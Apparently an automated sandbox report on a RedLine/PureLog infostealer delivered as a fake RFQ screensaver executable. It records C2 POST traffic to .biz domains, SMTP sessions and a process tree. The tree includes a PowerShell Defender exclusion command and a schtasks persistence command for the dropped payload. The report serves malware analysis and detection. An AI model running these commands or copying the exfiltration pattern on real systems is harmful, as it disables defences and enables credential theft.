Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50132	3.94.10.34	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:05.251046896 CEST	348	OUT	POST /unx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:43:05.251105070 CEST	778	OUT	Data Raw: 92 32 1b b3 e9 7d 8c ac fe 02 00 00 5d b2 69 88 2c 12 ba 26 87 cf 64 bd 3e 18 5b cd 03 a4 30 93 49 f4 d5 d4 1d 27 f9 27 59 99 ad e5 07 02 3e d0 b2 ec df b9 b2 29 6d b1 00 8d 83 3e 8a 85 a8 20 55 8d 34 47 9c 6e 97 ab 30 5c 66 cd cf bf 41 2e 19 48 Data Ascii: 2}]i,&d>[0I''Y>)m> U4Gn0\fA.HJh}9pyyZrJUlP>Fn,++d,o-<C6NEDbS Z/if%]&v4a7it!pW0ZdSMl;'!n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50138	44.213.104.86	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:06.948946953 CEST	359	OUT	POST /xurncvjdsxxnivfe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qpnczch.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:43:06.948975086 CEST	778	OUT	Data Raw: e2 19 71 e0 e1 e7 e6 23 fe 02 00 00 0d 70 db cd 5f 93 bc a7 24 03 31 bd a8 0e c9 1c 43 40 05 e5 dc 23 50 eb 20 7c 77 03 3a 44 6c ba 48 5f 49 70 45 ee 2f a7 0f 1a 25 d3 fc c5 12 c6 45 33 d2 2a da 85 fd b0 d7 dc 06 89 1f f2 32 81 e0 f5 64 5f 8c e4 Data Ascii: q#p_$1C@#P \|w:DlH_IpE/%E3*2d_-BRR"UGdyXrAHgbZc bm.CcaU8~d`EyB\|W9+D\]gNnGuI8u+H~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50139	47.129.31.212	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:07.472863913 CEST	354	OUT	POST /ptyighahceku HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:43:07.472923994 CEST	826	OUT	Data Raw: db 13 36 59 7f cb 5b 41 2e 03 00 00 18 30 a9 c1 ce 4c 6e f2 0c 81 6b df ac 31 49 94 7d 0b 36 68 a1 4f ba 4d e0 db d2 7d ca 82 9b 2e f3 ba dc 83 29 75 3b 39 d7 ee 32 e0 ef a0 5d a9 a2 52 42 87 82 92 b3 97 36 ff d4 86 46 6b 88 97 31 9c d4 15 7f 27 Data Ascii: 6Y[A.0Lnk1I}6hOM}.)u;92]RB6Fk1'>S8j.vMBbWvek{-I!No$bQ$P]-XUe6~]sZn'dFxWy3._D_{H(/`:V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50145	44.213.104.86	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:43:07.904275894 CEST	354	OUT	POST /kfucjjkorih HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qpnczch.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:43:07.904345036 CEST	778	OUT	Data Raw: 0a b8 9c 52 7e c5 7b e6 fe 02 00 00 ed 03 4f 9a 32 51 ab 4d 44 23 6a a8 96 97 34 22 36 46 df 75 7f 71 50 2b 61 f6 38 e2 43 ce 06 6d 85 c9 d7 82 b8 ef 85 85 66 61 6f dc ee b7 73 2d 83 0f 9e 12 78 25 c2 7e dd b3 1c 64 db 15 3b 84 98 8a b4 17 ce bd Data Ascii: R~{O2QMD#j4"6FuqP+a8Cmfaos-x%~d;26FffaW88ge+c66w^'lG}noY80PYShALV.t/9Dk%3-qy4G<x.9XEo3f)hqPJ
Oct 20, 2024 18:43:09.275129080 CEST	413	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:43:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3e354277ce025e774fdeab80c43d7501\|96.44.151.125\|1729442589\|1729442589\|0\|1\|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.26.12.205	443	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-20 16:41:12 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	104.26.12.205	443	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-20 16:41:14 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 20, 2024 18:41:18.250854015 CEST	587	49741	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sun, 20 Oct 2024 16:41:18 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 20, 2024 18:41:18.253952026 CEST	49741	587	192.168.2.4	51.195.88.199	EHLO 051829
Oct 20, 2024 18:41:18.556612015 CEST	587	49741	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 051829 [96.44.151.125] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 20, 2024 18:41:18.556895018 CEST	49741	587	192.168.2.4	51.195.88.199	STARTTLS
Oct 20, 2024 18:41:18.860172987 CEST	587	49741	51.195.88.199	192.168.2.4	220 TLS go ahead
Oct 20, 2024 18:41:23.211617947 CEST	587	49754	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sun, 20 Oct 2024 16:41:23 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 20, 2024 18:41:23.211741924 CEST	49754	587	192.168.2.4	51.195.88.199	EHLO 051829
Oct 20, 2024 18:41:23.526424885 CEST	587	49754	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 051829 [96.44.151.125] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 20, 2024 18:41:23.526572943 CEST	49754	587	192.168.2.4	51.195.88.199	STARTTLS
Oct 20, 2024 18:41:23.828897953 CEST	587	49754	51.195.88.199	192.168.2.4	220 TLS go ahead
Oct 20, 2024 18:42:48.383920908 CEST	587	50035	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sun, 20 Oct 2024 16:42:48 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 20, 2024 18:42:48.386960030 CEST	50035	587	192.168.2.4	51.195.88.199	EHLO 051829
Oct 20, 2024 18:42:48.698820114 CEST	587	50035	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 051829 [96.44.151.125] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 20, 2024 18:42:48.698945999 CEST	50035	587	192.168.2.4	51.195.88.199	STARTTLS
Oct 20, 2024 18:42:49.006536007 CEST	587	50035	51.195.88.199	192.168.2.4	220 TLS go ahead
Oct 20, 2024 18:43:10.930025101 CEST	587	50146	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sun, 20 Oct 2024 16:43:10 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 20, 2024 18:43:10.930206060 CEST	50146	587	192.168.2.4	51.195.88.199	EHLO 051829
Oct 20, 2024 18:43:11.237327099 CEST	587	50146	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 051829 [96.44.151.125] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 20, 2024 18:43:11.237539053 CEST	50146	587	192.168.2.4	51.195.88.199	STARTTLS
Oct 20, 2024 18:43:11.539371967 CEST	587	50146	51.195.88.199	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	12:41:01
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Imagebase:	0x400000
File size:	5'948'349 bytes
MD5 hash:	E2AB6FF49774A8D73F56E95EA4B5FDE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:41:05
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Imagebase:	0x3b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:41:05
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Imagebase:	0x400000
File size:	5'948'349 bytes
MD5 hash:	E2AB6FF49774A8D73F56E95EA4B5FDE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:41:08
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Imagebase:	0x3b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.1767717625.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1768367240.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:41:09
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\microsofts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\microsofts.exe"
Imagebase:	0x400000
File size:	1'425'408 bytes
MD5 hash:	1B1EC94BDE0A57A4A82BD2F20B2CB7F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.2074768669.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.2069513140.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.2069994712.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:41:09
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
Imagebase:	0x310000
File size:	587'776 bytes
MD5 hash:	8C8785AC6585CF5C794B74330B3DB88F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1759244489.0000000000312000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:41:10
Start date:	20/10/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'225'728 bytes
MD5 hash:	BE9575A7523344297F06EE1BFB41DB64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):	true
Commandline:
Imagebase:	0xbd0000
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	573992C0DD7C44238DCA534EBFE3BFB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase:	0x330000
File size:	307'712 bytes
MD5 hash:	3B6501FEEF6196F24163313A9F27DBFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:41:11
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x3b0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:41:13
Start date:	20/10/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	D2034B1C51807A88AF4C03FA40EBB801
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x290000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x650000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xf90000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:41:14
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x720000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:41:15
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0x90000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:41:17
Start date:	20/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:41:17
Start date:	20/10/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	88EB3A4B54A3BB575F73218A2A487C14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	12:41:19
Start date:	20/10/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'356'800 bytes
MD5 hash:	3FE71716DC381236318F40AD7E696866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:41:20
Start date:	20/10/2024
Path:	C:\Windows\System32\msdtc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\msdtc.exe
Imagebase:	0x140000000
File size:	1'278'464 bytes
MD5 hash:	51F79D9079F5ECD5822D4A712D6E0FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	12:41:22
Start date:	20/10/2024
Path:	C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:	0x140000000
File size:	1'235'968 bytes
MD5 hash:	7E2B07A2C35B902626802E23A74035AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	12:41:23
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\perfhost.exe
Imagebase:	0x400000
File size:	1'150'976 bytes
MD5 hash:	F1E10FE188A674DD70DDE06D821B689D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	12:41:23
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x230000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:41:24
Start date:	20/10/2024
Path:	C:\Windows\System32\Locator.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\locator.exe
Imagebase:	0x140000000
File size:	1'141'248 bytes
MD5 hash:	F35972F9178514C7C96BA5F70EBD6D0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	12:41:26
Start date:	20/10/2024
Path:	C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SensorDataService.exe
Imagebase:	0x140000000
File size:	1'846'784 bytes
MD5 hash:	EFF39178E107116F25C210E8F7E3BD8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:41:28
Start date:	20/10/2024
Path:	C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\snmptrap.exe
Imagebase:	0x140000000
File size:	1'146'880 bytes
MD5 hash:	49483B645B4353EA55A5E7C5EB864F13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	12:41:28
Start date:	20/10/2024
Path:	C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\spectrum.exe
Imagebase:	0x140000000
File size:	1'455'616 bytes
MD5 hash:	3B684CE90D25C1620D4492D93A4C2E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	12:41:30
Start date:	20/10/2024
Path:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:	0x140000000
File size:	1'511'424 bytes
MD5 hash:	22C8B35FC221B2E00B4C6D91C2FD5A99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	12:41:31
Start date:	20/10/2024
Path:	C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\TieringEngineService.exe
Imagebase:	0x140000000
File size:	1'455'616 bytes
MD5 hash:	8D1BA858E12A31A352EFC97D6B03E07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	12:41:32
Start date:	20/10/2024
Path:	C:\Windows\System32\AgentService.exe
Wow64 process (32bit):	false
